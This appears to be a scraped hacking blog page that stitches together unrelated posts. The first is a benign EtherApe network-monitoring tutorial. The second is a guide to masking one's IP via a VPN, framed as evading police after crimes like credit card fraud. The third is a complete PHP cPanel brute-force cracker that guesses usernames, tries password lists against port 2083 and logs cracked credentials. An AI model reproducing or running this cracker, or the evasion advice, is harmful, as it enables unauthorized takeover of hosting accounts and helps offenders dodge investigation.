EtherApe –Graphical Network Monitoring

Hello readers, we are back again with a new release, Matriux Krypton at nullcontritiya,Goa 2012. Thank you for your support throughout these years that we are able to bring in the bigger and better security solutions. This version includes some great features with 300 powerful penetration testing and forensic tools. The UI is made more elegant and faster. Based on Debian Squeeze with a custom compiled kernel 2.3.39-krypton Matriux is the fastest distribution of its kind and runs easily on a p-IV with as low as 256MB RAM and just 6GB HDD. Included new tools like reaver-wps, androguard, apkinspector, ssh server and many more. Installer (MID) is made more easy this time.

 

Doesn’t it look cool? Go, ahead give a try and let us know what you think of the new version.
Now coming to this months’ article on EtherApe, which is an open source graphical network monitor for Unix systems. It displays the network activity graphically with host and link sizes shrink and grow accordance with the traffic activity. Protocols are color coded. Some features of EtherApe include:-

•  Network view can be modified by applying filters
•  Can read traffic from file along with the network
•  A variety of protocols, packet types and frames are supported.
•  Clicking on any link or node will provide additional information regarding the protocols and traffic information
• Handles traffic on Ethernet, WLAN, VLAN plus several other media and encapsulation types
• Output can be exported into a XML file supported from version 0.9.11

EtherApe can be found in Matriux Arsenal under Arsenal --> Reconnaissance -->EtherApe (root) 

 

Or simply fire up EtherApe by typing EtherApe in terminal.
Note: Remember that EtherApe requires root permission to run, else you will get an error “No suitable Device found”.
To start monitoring the network select the network interface from the Menu Capture --> Interfaces.

 

This will start reading the network data from the interface selected and displays the network in graphical representation.

 

When you start EtherApe, you may or may not see traffic depending on whether there is traffic actively passing through your network. (Here I pinged Google and opened Matriux Forums in a browser to generate some network activity).
Also the data regarding this network activity can be viewed from Menu -->View --> Nodes/Protocol.

 

Showing the activity at the nodes.

 Showing the activity with respect to protocols, this data is useful in many ways to trouble shoot network or check for unwanted traffic etc.
Also clicking on any link/node in the network map will display the activity at that node/link.

 You can also configure EtherApe from the preferences in the menu.
 
Conclusion
 
EtherApe can also read a tcpdump file that will allow us to capture network traffic to a file and analyze that traffic later or in offline mode. Reason being, using EtherApe as root is not recommended to remotely monitor the network as you run a risk of transmitting the root information over the network. EtherApe is a great tool that can monitor the network and can be used for monitoring the network activity and their protocols. Go ahead and run EtherApe to see the visual beauty of the network ;)
Happy Hacking :)

IP Address Spoofing By Terrorists

When we send emails and browse internet our computer global IP Address automatically goes to service provider company server like gmail ,msn ,PayPal etc.

when any one done online crime like credit card fraud,send email to anyone hacker can easily traceable by Govt.police,etc. but professional hackers hide their IP address by proxy,tunnel,VNC etc.

Proxy is old trick we show your untraceable IP spoofing so you can hide your real IP into another IP address that provided by http://www.usaip.eu/en/ 

step1

before IP spoofing check your original geo. location from here http://whatismyipaddress.com/

step2

download VNC connection file from following website 

http://www.4shared.com/file/DN0VJgvs/usaip.html     

step3

Now open usaip.pbk file select any other server , here I select china server

  

step4

after open the file and connect to any server with demo as use and demo as password

----------------------------

user name-----> demo

password-----> demo

----------------------------

 

step5

at the last after IP spoofing check your geo. location from here http://whatismyipaddress.com/

 before IP spoofing my geo. location is India 

 after IP spoofing my geo.location is china 

Private Cpanel Cracker (Web hacking)

<?php
set_time_limit(0);

/********************************************************************
* Private Cpanel Cracker
* Coded by Miyachung
* miyachung@hotmail.com
* Janissaries.Org
* Demonstration -> http://www.youtube.com/watch?v=mLkudfIAPgA
*********************************************************************/

class cracker
{

 public  $sitelist;
 public  $passlist;
 
 public function calis()
 {
   $usernames   =  $this->make_username();
   $sitelist  = explode("\n",$this->openfile($this->sitelist)); 
   $passlist  = explode("\n",$this->openfile($this->passlist));
   $increment = 0;
   
   echo "\n\n[*]Site list -> $this->sitelist\n";
   echo "[*]Pass list -> $this->passlist\n";
   echo "[*]Total urls -> ".count($sitelist)."\n";
   echo "[*]Total pass -> ".count($passlist)."\n";
   echo "[*]Cracking started\n\n";
   
   foreach($sitelist as $id => $site)
   {
   $increment++;
   $site = trim($site);
   echo "-------------------------------------------------------\n";
   echo "[*]Trying site: ".$site." $increment / ".count($sitelist)."\n";
   if(eregi('http',$site)){
   $site = str_replace("http://","https://",$site);
   }else{ 
   $site = "https://$site";
   }
   $site= $site.":2083";
   
   if(!$this->pass_site($site))
   {
   echo "[-]Not cpanel,passing site\n";
   echo "-------------------------------------------------------\n\n";
   continue;
   }

   echo "[*]Connected Cpanel [OK]\n";
   echo "[*]Username: ".$usernames[$id]."\n";
   echo "[*]Loaded ".count($passlist)." passwords\n";
   echo "[*]Coded by Miyachung ||| Janissaries.Org\n";
    foreach($passlist as $pass)
    {
     $cracked = false;
     
     $pass=trim($pass);
     
     $result = $this->post($site,$usernames[$id],$pass);
     
     if(preg_match('/security_token/',$result))
     {
     $cracked = true;
     echo "[+]$pass password cracked for $usernames[$id]\n";
     echo "-------------------------------------------------------\n\n";
     $this->savefile("$site|$usernames[$id]|$pass");
     break;
     }
     
    }
   if(!$cracked){echo "[-]Not found\n";echo "-----------------------------------\n\n";}
   }
 
 }
 
 private function make_username()
 {
   $op = explode("\n",$this->openfile($this->sitelist));
   foreach($op as $site)
   {
   
   if(eregi('http://',$site)) $site  = str_replace("http://","",$site);
   if(!eregi('www',$site))    $site  = "www.".$site;
   
   $site = explode(".",$site);
   $site = str_replace("-","",$site[1]);
   
   $usernames[] = substr($site,0,8);
   
   }
   return $usernames;
 }
 
 public function lists()
 {
   echo "[!]Site list: ";
   $sitelist = fgets(STDIN);
   $sitelist = str_replace("\r\n","",$sitelist);
   $sitelist = trim($sitelist);
   echo "[!]Pass list: ";
   $passlist = fgets(STDIN);
   $passlist = str_replace("\r\n","",$passlist);
   $passlist = trim($passlist);
   
   return array($sitelist,$passlist);
 }
 
 private function post($site,$user,$pass)
 {
   $curl = curl_init();
   curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);
   curl_setopt($curl,CURLOPT_URL,$site."/login/?login_only=1");
   curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,0);
   curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,0);
   curl_setopt($curl,CURLOPT_TIMEOUT,7);
   curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);
   curl_setopt($curl,CURLOPT_POST,1);
   curl_setopt($curl,CURLOPT_POSTFIELDS,"user=$user&pass=$pass");
   $exec = curl_exec($curl);
   return $exec;
 }
 
 private function pass_site($site)
 {
   $curl = curl_init();
   curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);
   curl_setopt($curl,CURLOPT_URL,$site);
   curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,0);
   curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,0);
   curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);
   curl_setopt($curl,CURLOPT_TIMEOUT,7);
   $exec = curl_exec($curl);
   $info = curl_getinfo($curl);
   
   if($info['http_code'] != 0)
   {
   return true;
   }
   else
   {
   return false;
   }
 
 }
 
 private function openfile($file)
 {
   $file = @file_get_contents($file);
   if(!$file) exit("WTF File not found ?");
   return $file;
 }
 
 private function savefile($content)
 {
   $file = fopen('crackerlog.txt','ab');
   fwrite($file,$content."\r\n");
   fclose($file);
   return $file;
 }

}

$class      =   new cracker();
$lists      =   $class->lists();

   if(empty($lists[0]) || empty($lists[1])) exit("WTF Empty ? "); 
   
$class->sitelist   =   $lists[0];
$class->passlist   =   $lists[1];
$class->calis();


?>